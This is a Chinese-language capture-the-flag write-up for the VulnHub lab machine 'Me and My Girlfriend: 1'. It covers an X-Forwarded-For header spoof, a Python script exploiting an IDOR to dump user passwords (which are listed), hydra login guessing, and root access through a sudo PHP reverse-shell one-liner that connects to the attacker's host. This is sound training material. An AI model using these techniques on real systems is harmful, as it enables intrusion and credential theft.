vulnhub靶機之Me and My Girlfriend: 1

0x00 引子

靶機主頁：https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

先看描述：

這是個菜鳥級的任務，我們的目標是拿到兩個flag，在哪兒，不知道。

0x01 主機 & 服務發現

把靶機下載下來在VMware中啟動，會自動通過DHCP獲取ip地址，先看下當前網絡內存活的主機都有哪些：

對比我虛擬機DHCP的IP池可以知道192.168.1.204就是這個靶機（這里就使用最簡單的方式確定靶機ip了），然后掃描靶機有哪些開放的端口：

0x02 web服務權限漏洞

發現有個web服務，訪問一下：

艾瑪，被拒絕了，網頁中有提示：

http請求頭X-Forwarded-For可用於客戶端的地址，使用chrome插件mod header修改一下請求頭：

然后再請求，能夠看到正常頁面了：

在這里點啊點啊點，都點過一遍了，發現有個profile頁，能夠看到自己的賬號密碼：

修改地址欄上的user_id參數：

顯示了別人的資料，OK，這里可以脫一下庫，我新注冊的這個賬號的user_id是13，說明數據庫中最多有13條記錄，那么遍歷出所有數據：

import requests

from bs4 import BeautifulSoup

if __name__ == '__main__':
    for user_id in range(1, 13):
        url = 'http://192.168.1.204/index.php?page=profile&user_id=' + str(user_id)
        response = requests.get(url, headers={'X-Forwarded-For': '127.0.0.1', 'Cookie': 'PHPSESSID=0c5u4fm64g0vee8ceofuer8m52'})
        dom = BeautifulSoup(response.content.decode('UTF-8'))

        username = dom.find('input', id='username')['value']
        passwd = dom.find('input', id='password')['value']

        if username:
            print(username + ":" + passwd)

得到：

eweuhtandingan:skuyatuh
aingmaung:qwerty!!!
sundatea:indONEsia
sedihaingmah:cedihhihihi
alice:4lic3
abdikasepak:dorrrrr
aa:aa

0x03 alice賬號，Get！

上面脫褲時冒號分割是為了給hydra用，保存為一個文件使用hydra嘗試：

alice的賬號，Get！！！

進去就是一頓亂瞅，發現一個可疑文件夾，進去看一下：

有兩個文件：

這是第一個flag：

這。。。好像有點尷尬。。。

0x04 提權

查看自己可以以root權限執行的命令，發現自己是可以以root權限執行php命令的，而php又是可以執行本地命令的，所以就相當於alice可以執行root命令。

在kali機器上監聽一個端口：

nc -lvp 10086

然后靶機上的alice創建一個php反彈shell去連接它：

sudo /usr/bin/php -r '$sock=fsockopen("192.168.1.172",10086);exec("/bin/bash -i <&3 >&3 2>&3");'

返回kali這邊已經登錄進root了，進去之后照例一頓亂瞅：

找到了第二個flag：

至此，拿到了兩個完整的flag，任務完成！

最后吐槽，我發現Alice和Bob的檔期真滿，哪哪兒都有他倆。。。。

。